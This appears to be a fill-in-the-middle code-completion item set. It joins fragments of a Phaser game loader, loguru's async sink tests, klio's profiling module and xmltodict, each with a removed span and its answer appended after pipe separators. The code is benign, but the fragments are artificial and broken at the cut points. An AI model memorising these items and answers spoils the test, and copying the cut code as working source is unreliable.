game.load.spritesheet('enemy-bullet', './assets/enemy_bullet.png', 16, 16);
game.load.spritesheet('grunt', './assets/enemy_square.png', 70, 70);
game.load.spritesheet('youdied', './assets/youdied.png', 401, 121);
game.load.spritesheet('damagenotif', './assets/damagenotif.png', 401, 121);
game.load.spritesheet('frnotif', './assets/frnotif.png', 401, 121);
game.load.spritesheet('damageIncrease', './assets/damageIncrease.png', 50, 50);
game.load.spritesheet('fireRateUp', './assets/fireRateUp.png', 50, 50);
game.load.spritesheet('healthup', './assets/healthup.png', 50, 50);
game.load.spritesheet('health', './assets/health.png', 100, 100);
game.load.spritesheet('exit', './assets/exit.png', 100, 100);
game.load.spritesheet('levelcomplete', './assets/levelcomplete.png', 401, 121);
game.load.audio('bullet-fire', './assets/fire_bullet.ogg');
game.load.audio('erase', './assets/erase.ogg');
game.sound.add('bullet-fire', sfxVol);
},
create: function() {
game.state.start('MainMenu');
}
};
game.state.add('Boot', BootState);
game.state.add('Load', LoadState);
game.state.add('Game', Dungeon); | game.state.add('GameOver', GameOverState);
game.state.add('MainMenu', MainMenuState);
game.state.add('Complete', CompletedState);
game.state.start('Boot'); |
|
test_coroutine_sink.py | import asyncio
import logging
import multiprocessing
import re
import sys
import threading
import pytest
import loguru
from loguru import logger
async def async_writer(msg):
await asyncio.sleep(0.01)
print(msg, end="")
class AsyncWriter:
async def __call__(self, msg):
await asyncio.sleep(0.01)
print(msg, end="")
def test_coroutine_function(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_async_callable_sink(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(AsyncWriter(), format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_concurrent_execution(capsys):
async def task(i):
logger.debug("=> {}", i)
async def main():
tasks = [task(i) for i in range(10)]
await asyncio.gather(*tasks)
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(main())
out, err = capsys.readouterr()
assert err == ""
assert sorted(out.splitlines()) == sorted("=> %d" % i for i in range(10))
def test_recursive_coroutine(capsys):
async def task(i):
if i == 0:
await logger.complete()
return
logger.info("{}!", i)
await task(i - 1)
logger.add(async_writer, format="{message}")
asyncio.run(task(9))
out, err = capsys.readouterr()
assert err == ""
assert sorted(out.splitlines()) == sorted("%d!" % i for i in range(1, 10))
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_using_another_event_loop(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_using_another_event_loop_set_global_before_add(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_using_another_event_loop_set_global_after_add(capsys):
async def | ():
logger.debug("A message")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
asyncio.set_event_loop(loop)
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_run_multiple_different_loops(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
logger.add(async_writer, format="{message}", loop=None)
asyncio.run(worker(1))
asyncio.run(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_run_multiple_same_loop(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker(1))
loop.run_until_complete(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
def test_run_multiple_same_loop_set_global(capsys):
async def worker(i):
logger.debug("Message {}", i)
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker(1))
loop.run_until_complete(worker(2))
out, err = capsys.readouterr()
assert err == ""
assert out == "Message 1\nMessage 2\n"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_complete_in_another_run(capsys):
async def worker_1():
logger.debug("A")
async def worker_2():
logger.debug("B")
await logger.complete()
loop = asyncio.new_event_loop()
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker_1())
loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_complete_in_another_run_set_global(capsys):
async def worker_1():
logger.debug("A")
async def worker_2():
logger.debug("B")
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, format="{message}", loop=loop)
loop.run_until_complete(worker_1())
loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_tasks_cancelled_on_remove(capsys):
logger.add(async_writer, format="{message}", catch=False)
async def foo():
logger.info("A")
logger.info("B")
logger.info("C")
logger.remove()
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_remove_without_tasks(capsys):
logger.add(async_writer, format="{message}", catch=False)
logger.remove()
async def foo():
logger.info("!")
await logger.complete()
asyncio.run(foo())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_without_tasks(capsys):
logger.add(async_writer, catch=False)
async def worker():
await logger.complete()
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == err == ""
def test_complete_stream_noop(capsys):
logger.add(sys.stderr, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_complete_file_noop(tmpdir):
filepath = tmpdir.join("test.log")
logger.add(str(filepath), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert filepath.read() == "A\nB\nC\nD\n"
def test_complete_function_noop():
out = ""
def write(msg):
nonlocal out
out += msg
logger.add(write, format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
assert out == "A\nB\nC\nD\n"
def test_complete_standard_noop(capsys):
logger.add(logging.StreamHandler(sys.stderr), format="{message}", catch=False)
logger.info("A")
async def worker():
logger.info("B")
await logger.complete()
logger.info("C")
asyncio.run(worker())
logger.info("D")
out, err = capsys.readouterr()
assert out == ""
assert err == "A\nB\nC\nD\n"
def test_exception_in_coroutine_caught(capsys):
async def sink(msg):
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_not_caught(capsys, caplog):
async def sink(msg):
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await asyncio.sleep(0.1)
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
def test_exception_in_coroutine_during_complete_caught(capsys):
async def sink(msg):
await asyncio.sleep(0.1)
raise Exception("Oh no")
async def main():
logger.add(sink, catch=True)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
lines = err.strip().splitlines()
assert out == ""
assert lines[0] == "--- Logging error in Loguru Handler #0 ---"
assert re.match(r"Record was: \{.*Hello world.*\}", lines[1])
assert lines[-2] == "Exception: Oh no"
assert lines[-1] == "--- End of logging error ---"
def test_exception_in_coroutine_during_complete_not_caught(capsys, caplog):
async def sink(msg):
await asyncio.sleep(0.1)
raise ValueError("Oh no")
async def main():
logger.add(sink, catch=False)
logger.info("Hello world")
await logger.complete()
asyncio.run(main())
out, err = capsys.readouterr()
assert out == err == ""
records = caplog.records
assert len(records) == 1
record = records[0]
message = record.getMessage()
assert "Logging error in Loguru Handler" not in message
assert "was never retrieved" not in message
exc_type, exc_value, _ = record.exc_info
assert exc_type == ValueError
assert str(exc_value) == "Oh no"
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_enqueue_coroutine_loop_not_none(capsys):
loop = asyncio.new_event_loop()
logger.add(async_writer, enqueue=True, loop=loop, format="{message}", catch=False)
async def worker():
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_enqueue_coroutine_loop_not_none_set_global(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, enqueue=True, loop=loop, format="{message}", catch=False)
async def worker():
logger.info("A")
await logger.complete()
loop.run_until_complete(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
def test_enqueue_coroutine_loop_is_none(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, enqueue=True, loop=None, format="{message}", catch=False)
async def worker(msg):
logger.info(msg)
await logger.complete()
asyncio.run(worker("A"))
out, err = capsys.readouterr()
assert out == err == ""
loop.run_until_complete(worker("B"))
out, err = capsys.readouterr()
assert out == "A\nB\n"
assert err == ""
def test_enqueue_coroutine_loop_is_none_set_global(capsys):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
logger.add(async_writer, enqueue=True, loop=None, format="{message}", catch=False)
async def worker(msg):
logger.info(msg)
await logger.complete()
loop.run_until_complete(worker("A"))
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_custom_complete_function(capsys):
awaited = False
class Handler:
def write(self, message):
print(message, end="")
async def complete(self):
nonlocal awaited
awaited = True
async def worker():
logger.info("A")
await logger.complete()
logger.add(Handler(), catch=False, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
assert awaited
@pytest.mark.skipif(sys.version_info < (3, 5, 3), reason="Coroutine can't access running loop")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_complete_from_another_loop(capsys, loop_is_none):
main_loop = asyncio.new_event_loop()
second_loop = asyncio.new_event_loop()
loop = None if loop_is_none else main_loop
logger.add(async_writer, loop=loop, format="{message}")
async def worker_1():
logger.info("A")
async def worker_2():
await logger.complete()
main_loop.run_until_complete(worker_1())
second_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == err == ""
main_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_complete_from_another_loop_set_global(capsys, loop_is_none):
main_loop = asyncio.new_event_loop()
second_loop = asyncio.new_event_loop()
loop = None if loop_is_none else main_loop
logger.add(async_writer, loop=loop, format="{message}")
async def worker_1():
logger.info("A")
async def worker_2():
await logger.complete()
asyncio.set_event_loop(main_loop)
main_loop.run_until_complete(worker_1())
asyncio.set_event_loop(second_loop)
second_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == err == ""
asyncio.set_event_loop(main_loop)
main_loop.run_until_complete(worker_2())
out, err = capsys.readouterr()
assert out == "A\n"
assert err == ""
def test_complete_from_multiple_threads_loop_is_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
logger.add(sink, catch=False, format="{message}")
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
def test_complete_from_multiple_threads_loop_is_not_none(capsys):
async def worker(i):
for j in range(100):
await asyncio.sleep(0)
logger.info("{:03}", i)
await logger.complete()
async def sink(msg):
print(msg, end="")
def worker_(i):
asyncio.run(worker(i))
loop = asyncio.new_event_loop()
logger.add(sink, catch=False, format="{message}", loop=loop)
threads = [threading.Thread(target=worker_, args=(i,)) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert sorted(out.splitlines()) == ["{:03}".format(i) for i in range(10) for _ in range(100)]
assert err == ""
async def async_subworker(logger_):
logger_.info("Child")
await logger_.complete()
async def async_mainworker(logger_):
logger_.info("Main")
await logger_.complete()
def subworker(logger_):
loop = asyncio.get_event_loop()
loop.run_until_complete(async_subworker(logger_))
class Writer:
def __init__(self):
self.output = ""
async def write(self, message):
self.output += message
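# The enqueued handler's queue and the child process must come from the same multiprocessing
# context, so the "spawn" context is patched into loguru._handler before the sink is added.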
def test_complete_with_sub_processes(monkeypatch, capsys):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
loop = asyncio.new_event_loop()
writer = Writer()
logger.add(writer.write, format="{message}", enqueue=True, loop=loop)
process = ctx.Process(target=subworker, args=[logger])
process.start()
process.join()
async def complete():
await logger.complete()
loop.run_until_complete(complete())
out, err = capsys.readouterr()
assert out == err == ""
assert writer.output == "Child\n"
| worker |
profile.py | # Copyright 2020 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import collections
import contextlib
import functools
import logging
import os
import subprocess
import sys
import tempfile
import time
import apache_beam as beam
try:
import memory_profiler
except ImportError: # pragma: no cover
logging.error(
"Failed to import profiling dependencies. Did you install "
"`klio-exec[debug]` in your job's Docker image?"
)
raise SystemExit(1)
from klio.transforms import decorators
from klio_core.proto import klio_pb2
from klio_exec.commands.utils import cpu_utils
from klio_exec.commands.utils import memory_utils
from klio_exec.commands.utils import profile_utils
@contextlib.contextmanager
def smart_open(filename=None, fmode=None):
"""Handle both stdout and files in the same manner."""
if filename and filename != "-":
fh = open(filename, fmode)
else:
fh = sys.stdout
try:
yield fh
finally:
if fh is not sys.stdout:
fh.close()
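# For example, smart_open("stats.txt", "w") yields a file handle that is closed on exit,
# while smart_open(None) or smart_open("-") yields sys.stdout and leaves it open.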
class StubIOSubMapper(object):
def __init__(self, input_pcol):
def fake_constructor(*args, **kwargs):
return input_pcol
# normally this is a map of io-name -> transform class. Instead we'll
# just have every possible name return our pretend constructor that
# returns our pre-constructed transform
self.input = collections.defaultdict(lambda: fake_constructor)
self.output = {} # no outputs
class StubIOMapper(object):
def __init__(self, input_pcol, iterations):
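        # Repeat every input element `iterations` times so a single profiling run
        # exercises the user transforms repeatedly.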
repeated_input = input_pcol | beam.FlatMap(lambda x: [x] * iterations)
self.batch = StubIOSubMapper(repeated_input)
self.streaming = StubIOSubMapper(repeated_input)
@staticmethod
def from_input_file(file_path, iterations):
transform = beam.io.ReadFromText(file_path)
return StubIOMapper(transform, iterations)
@staticmethod
def from_entity_ids(id_list, iterations):
transform = beam.Create(id_list)
return StubIOMapper(transform, iterations)
class KlioPipeline(object):
DEFAULT_FILE_PREFIX = "klio_profile_{what}_{ts}"
TRANSFORMS_PATH = "./transforms.py"
def __init__(
self, klio_config, input_file=None, output_file=None, entity_ids=None
):
self.input_file = input_file
self.output_file = output_file
self.entity_ids = entity_ids
self._stream = None
self._now_str = time.strftime("%Y%m%d%H%M%S", time.localtime())
self.klio_config = klio_config
def _get_output_png_file(self, what, temp_output):
output_file_base = self.output_file
prefix = KlioPipeline.DEFAULT_FILE_PREFIX.format(
what=what, ts=self._now_str
)
if temp_output:
output_file_base = prefix
elif "." in self.output_file:
# reuse a user's output file name, just replace existing extension
output_file_base = os.path.splitext(self.output_file)[0]
return "{}.png".format(output_file_base)
@contextlib.contextmanager
def _smart_temp_create(self, what, plot_graph):
# For plotting a graph, an output file of the data collected is
# needed, but the user shouldn't be required to provide an output
# file if they don't want. This creates a tempfile to write data
# to for generating the plot graph off of.
# A context manager needed so that temp file can be cleaned up after.
temp_output = False
prefix = KlioPipeline.DEFAULT_FILE_PREFIX.format(
what=what, ts=self._now_str
)
if plot_graph and not self.output_file:
temp_output_file = tempfile.NamedTemporaryFile(
dir=".", prefix=prefix
)
self.output_file = temp_output_file.name
temp_output = True
yield temp_output
def _get_subproc(self, **kwargs):
cmd = ["klioexec", "profile", "run-pipeline"]
if kwargs.get("show_logs"):
cmd.append("--show-logs")
if self.input_file:
cmd.extend(["--input-file", self.input_file])
else:
cmd.extend(self.entity_ids)
return subprocess.Popen(cmd)
def _get_cpu_line_profiler(self):
return cpu_utils.KLineProfiler()
def _profile_wall_time_per_line(self, iterations, **_):
profiler = self._get_cpu_line_profiler()
decorators.ACTIVE_PROFILER = profiler
self._run_pipeline(iterations=iterations)
if self.output_file:
return profiler.print_stats(self.output_file, output_unit=1)
# output_unit = 1 second, meaning the numbers in "Time" and
# "Per Hit" columns are in seconds
profiler.print_stats(output_unit=1)
def _get_memory_line_profiler(self):
return memory_utils.KMemoryLineProfiler(backend="psutil")
def | (self, profiler, get_maximum):
wrapper = memory_utils.KMemoryLineProfiler.wrap_per_element
if get_maximum:
wrapper = functools.partial(
memory_utils.KMemoryLineProfiler.wrap_maximum, profiler
)
return wrapper
def _profile_memory_per_line(self, get_maximum=False):
profiler = self._get_memory_line_profiler()
decorators.ACTIVE_PROFILER = self._get_memory_line_wrapper(
profiler, get_maximum
)
# "a"ppend if output per element; "w"rite (once) for maximum.
# append will append a file with potentially already-existing data
# (i.e. from a previous run), which may be confusing; but with how
# memory_profiler treats streams, there's no simple way to prevent
# appending data for per-element without re-implementing parts of
# memory_profiler (maybe someday?) @lynn
fmode = "w" if get_maximum else "a"
with smart_open(self.output_file, fmode=fmode) as f:
self._stream = f
self._run_pipeline()
if get_maximum:
memory_profiler.show_results(profiler, stream=self._stream)
def _profile_memory(self, **kwargs):
# Profile the memory while the pipeline runs in another process
p = self._get_subproc(**kwargs)
plot_graph = kwargs.get("plot_graph")
with self._smart_temp_create("memory", plot_graph) as temp_output:
with smart_open(self.output_file, fmode="w") as f:
memory_profiler.memory_usage(
proc=p,
interval=kwargs.get("interval"),
timestamps=True,
include_children=kwargs.get("include_children"),
multiprocess=kwargs.get("multiprocess"),
stream=f,
)
if not plot_graph:
return
output_png = self._get_output_png_file("memory", temp_output)
profile_utils.plot(
input_file=self.output_file,
output_file=output_png,
x_label="Time (in seconds)",
y_label="Memory used (in MiB)",
title="Memory Used While Running Klio-based Transforms",
)
return output_png
def _profile_cpu(self, **kwargs):
# Profile the CPU while the pipeline runs in another process
p = self._get_subproc(**kwargs)
plot_graph = kwargs.get("plot_graph")
with self._smart_temp_create("cpu", plot_graph) as temp_output:
with smart_open(self.output_file, fmode="w") as f:
cpu_utils.get_cpu_usage(
proc=p, interval=kwargs.get("interval"), stream=f,
)
if not plot_graph:
return
output_png = self._get_output_png_file("cpu", temp_output)
profile_utils.plot(
input_file=self.output_file,
output_file=output_png,
x_label="Time (in seconds)",
y_label="CPU%",
title="CPU Usage of All Klio-based Transforms",
)
return output_png
def _get_user_pipeline(self, config, io_mapper):
runtime_config = collections.namedtuple(
"RuntimeConfig",
["image_tag", "direct_runner", "update", "blocking"],
)(None, True, False, True)
from klio_exec.commands.run import KlioPipeline as KP
return KP("profile_job", config, runtime_config, io_mapper)
def _get_user_config(self):
self.klio_config.pipeline_options.runner = "direct"
self.klio_config.job_config.events.outputs = {}
return self.klio_config
@staticmethod
def _entity_id_to_message(entity_id):
message = klio_pb2.KlioMessage()
message.data.element = bytes(entity_id, "UTF-8")
message.metadata.intended_recipients.anyone.SetInParent()
message.version = klio_pb2.Version.V2
return message
def _get_io_mapper(self, iterations):
if self.input_file:
return StubIOMapper.from_input_file(self.input_file, iterations)
else:
messages = []
for entity_id in self.entity_ids:
message = self._entity_id_to_message(entity_id)
messages.append(message.SerializeToString())
return StubIOMapper.from_entity_ids(messages, iterations)
def _run_pipeline(self, iterations=None, **_):
if not iterations:
iterations = 1
io_mapper = self._get_io_mapper(iterations)
config = self._get_user_config()
pipeline = self._get_user_pipeline(config, io_mapper)
pipeline.run()
def profile(self, what, **kwargs):
if what == "run":
return self._run_pipeline(**kwargs)
elif what == "cpu":
return self._profile_cpu(**kwargs)
elif what == "memory":
return self._profile_memory(**kwargs)
elif what == "memory_per_line":
return self._profile_memory_per_line(**kwargs)
elif what == "timeit":
return self._profile_wall_time_per_line(**kwargs)
| _get_memory_line_wrapper |
xmltodict.py | #!/usr/bin/env python
"Makes working with XML feel like you are working with JSON"
## https://github.com/martinblech/xmltodict
try:
from defusedexpat import pyexpat as expat
except ImportError:
from xml.parsers import expat
from xml.sax.saxutils import XMLGenerator
from xml.sax.xmlreader import AttributesImpl
try: # pragma no cover
from cStringIO import StringIO
except ImportError: # pragma no cover
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try: # pragma no cover
from collections import OrderedDict
except ImportError: # pragma no cover
try:
from ordereddict import OrderedDict
except ImportError:
OrderedDict = dict
try: # pragma no cover
_basestring = basestring
except NameError: # pragma no cover
_basestring = str
try: # pragma no cover
_unicode = unicode
except NameError: # pragma no cover
_unicode = str
__author__ = 'Martin Blech'
__version__ = '0.11.0'
__license__ = 'MIT'
class ParsingInterrupted(Exception):
pass
class _DictSAXHandler(object):
def __init__(self,
item_depth=0,
item_callback=lambda *args: True,
xml_attribs=True,
attr_prefix='@',
cdata_key='#text',
force_cdata=False,
cdata_separator='',
postprocessor=None, | force_list=None):
self.path = []
self.stack = []
self.data = []
self.item = None
self.item_depth = item_depth
self.xml_attribs = xml_attribs
self.item_callback = item_callback
self.attr_prefix = attr_prefix
self.cdata_key = cdata_key
self.force_cdata = force_cdata
self.cdata_separator = cdata_separator
self.postprocessor = postprocessor
self.dict_constructor = dict_constructor
self.strip_whitespace = strip_whitespace
self.namespace_separator = namespace_separator
self.namespaces = namespaces
self.namespace_declarations = OrderedDict()
self.force_list = force_list
def _build_name(self, full_name):
if not self.namespaces:
return full_name
i = full_name.rfind(self.namespace_separator)
if i == -1:
return full_name
namespace, name = full_name[:i], full_name[i+1:]
short_namespace = self.namespaces.get(namespace, namespace)
if not short_namespace:
return name
else:
return self.namespace_separator.join((short_namespace, name))
def _attrs_to_dict(self, attrs):
if isinstance(attrs, dict):
return attrs
return self.dict_constructor(zip(attrs[0::2], attrs[1::2]))
def startNamespaceDecl(self, prefix, uri):
self.namespace_declarations[prefix or ''] = uri
def startElement(self, full_name, attrs):
name = self._build_name(full_name)
attrs = self._attrs_to_dict(attrs)
if attrs and self.namespace_declarations:
attrs['xmlns'] = self.namespace_declarations
self.namespace_declarations = OrderedDict()
self.path.append((name, attrs or None))
if len(self.path) > self.item_depth:
self.stack.append((self.item, self.data))
if self.xml_attribs:
attr_entries = []
for key, value in attrs.items():
key = self.attr_prefix+self._build_name(key)
if self.postprocessor:
entry = self.postprocessor(self.path, key, value)
else:
entry = (key, value)
if entry:
attr_entries.append(entry)
attrs = self.dict_constructor(attr_entries)
else:
attrs = None
self.item = attrs or None
self.data = []
def endElement(self, full_name):
name = self._build_name(full_name)
if len(self.path) == self.item_depth:
item = self.item
if item is None:
item = (None if not self.data
else self.cdata_separator.join(self.data))
should_continue = self.item_callback(self.path, item)
if not should_continue:
raise ParsingInterrupted()
if len(self.stack):
data = (None if not self.data
else self.cdata_separator.join(self.data))
item = self.item
self.item, self.data = self.stack.pop()
if self.strip_whitespace and data:
data = data.strip() or None
if data and self.force_cdata and item is None:
item = self.dict_constructor()
if item is not None:
if data:
self.push_data(item, self.cdata_key, data)
self.item = self.push_data(self.item, name, item)
else:
self.item = self.push_data(self.item, name, data)
else:
self.item = None
self.data = []
self.path.pop()
def characters(self, data):
if not self.data:
self.data = [data]
else:
self.data.append(data)
def push_data(self, item, key, data):
if self.postprocessor is not None:
result = self.postprocessor(self.path, key, data)
if result is None:
return item
key, data = result
if item is None:
item = self.dict_constructor()
try:
value = item[key]
if isinstance(value, list):
value.append(data)
else:
item[key] = [value, data]
except KeyError:
if self._should_force_list(key, data):
item[key] = [data]
else:
item[key] = data
return item
def _should_force_list(self, key, value):
if not self.force_list:
return False
try:
return key in self.force_list
except TypeError:
return self.force_list(self.path[:-1], key, value)
def parse(xml_input, encoding=None, expat=expat, process_namespaces=False,
namespace_separator=':', disable_entities=True, **kwargs):
"""Parse the given XML input and convert it into a dictionary.
`xml_input` can either be a `string` or a file-like object.
If `xml_attribs` is `True`, element attributes are put in the dictionary
among regular child elements, using `@` as a prefix to avoid collisions. If
set to `False`, they are just ignored.
Simple example::
>>> import xmltodict
>>> doc = xmltodict.parse(\"\"\"
... <a prop="x">
... <b>1</b>
... <b>2</b>
... </a>
... \"\"\")
>>> doc['a']['@prop']
u'x'
>>> doc['a']['b']
[u'1', u'2']
If `item_depth` is `0`, the function returns a dictionary for the root
element (default behavior). Otherwise, it calls `item_callback` every time
an item at the specified depth is found and returns `None` in the end
(streaming mode).
The callback function receives two parameters: the `path` from the document
root to the item (name-attribs pairs), and the `item` (dict). If the
callback's return value is false-ish, parsing will be stopped with the
:class:`ParsingInterrupted` exception.
Streaming example::
>>> def handle(path, item):
... print('path:%s item:%s' % (path, item))
... return True
...
>>> xmltodict.parse(\"\"\"
... <a prop="x">
... <b>1</b>
... <b>2</b>
... </a>\"\"\", item_depth=2, item_callback=handle)
path:[(u'a', {u'prop': u'x'}), (u'b', None)] item:1
path:[(u'a', {u'prop': u'x'}), (u'b', None)] item:2
The optional argument `postprocessor` is a function that takes `path`,
`key` and `value` as positional arguments and returns a new `(key, value)`
pair where both `key` and `value` may have changed. Usage example::
>>> def postprocessor(path, key, value):
... try:
... return key + ':int', int(value)
... except (ValueError, TypeError):
... return key, value
>>> xmltodict.parse('<a><b>1</b><b>2</b><b>x</b></a>',
... postprocessor=postprocessor)
OrderedDict([(u'a', OrderedDict([(u'b:int', [1, 2]), (u'b', u'x')]))])
You can pass an alternate version of `expat` (such as `defusedexpat`) by
using the `expat` parameter. E.g:
>>> import defusedexpat
>>> xmltodict.parse('<a>hello</a>', expat=defusedexpat.pyexpat)
OrderedDict([(u'a', u'hello')])
You can use the force_list argument to force lists to be created even
when there is only a single child of a given level of hierarchy. The
force_list argument is a tuple of keys. If the key for a given level
of hierarchy is in the force_list argument, that level of hierarchy
will have a list as a child (even if there is only one sub-element).
    The index_keys operation takes precedence over this. This is applied
after any user-supplied postprocessor has already run.
For example, given this input:
<servers>
<server>
<name>host1</name>
<os>Linux</os>
<interfaces>
<interface>
<name>em0</name>
<ip_address>10.0.0.1</ip_address>
</interface>
</interfaces>
</server>
</servers>
If called with force_list=('interface',), it will produce
this dictionary:
        {'servers':
          {'server':
            {'name': 'host1',
             'os': 'Linux',
             'interfaces':
               {'interface':
                 [ {'name': 'em0', 'ip_address': '10.0.0.1' } ] } } } }
`force_list` can also be a callable that receives `path`, `key` and
`value`. This is helpful in cases where the logic that decides whether
a list should be forced is more complex.
"""
handler = _DictSAXHandler(namespace_separator=namespace_separator,
**kwargs)
if isinstance(xml_input, _unicode):
if not encoding:
encoding = 'utf-8'
xml_input = xml_input.encode(encoding)
if not process_namespaces:
namespace_separator = None
parser = expat.ParserCreate(
encoding,
namespace_separator
)
try:
parser.ordered_attributes = True
except AttributeError:
# Jython's expat does not support ordered_attributes
pass
parser.StartNamespaceDeclHandler = handler.startNamespaceDecl
parser.StartElementHandler = handler.startElement
parser.EndElementHandler = handler.endElement
parser.CharacterDataHandler = handler.characters
parser.buffer_text = True
if disable_entities:
try:
# Attempt to disable DTD in Jython's expat parser (Xerces-J).
feature = "http://apache.org/xml/features/disallow-doctype-decl"
parser._reader.setFeature(feature, True)
except AttributeError:
# For CPython / expat parser.
# Anything not handled ends up here and entities aren't expanded.
parser.DefaultHandler = lambda x: None
# Expects an integer return; zero means failure -> expat.ExpatError.
parser.ExternalEntityRefHandler = lambda *x: 1
if hasattr(xml_input, 'read'):
parser.ParseFile(xml_input)
else:
parser.Parse(xml_input, True)
return handler.item
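# Illustrative sketch (not part of the library): as the parse() docstring notes,
# `force_list` may also be a callable receiving (path, key, value). A hedged example
# that forces a list only for <interface> elements:
#
#     def force_list_interfaces(path, key, value):
#         return key == 'interface'
#
#     parse(xml_string, force_list=force_list_interfaces)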
def _process_namespace(name, namespaces, ns_sep=':', attr_prefix='@'):
if not namespaces:
return name
try:
ns, name = name.rsplit(ns_sep, 1)
except ValueError:
pass
else:
ns_res = namespaces.get(ns.strip(attr_prefix))
name = '{0}{1}{2}{3}'.format(
attr_prefix if ns.startswith(attr_prefix) else '',
ns_res, ns_sep, name) if ns_res else name
return name
def _emit(key, value, content_handler,
attr_prefix='@',
cdata_key='#text',
depth=0,
preprocessor=None,
pretty=False,
newl='\n',
indent='\t',
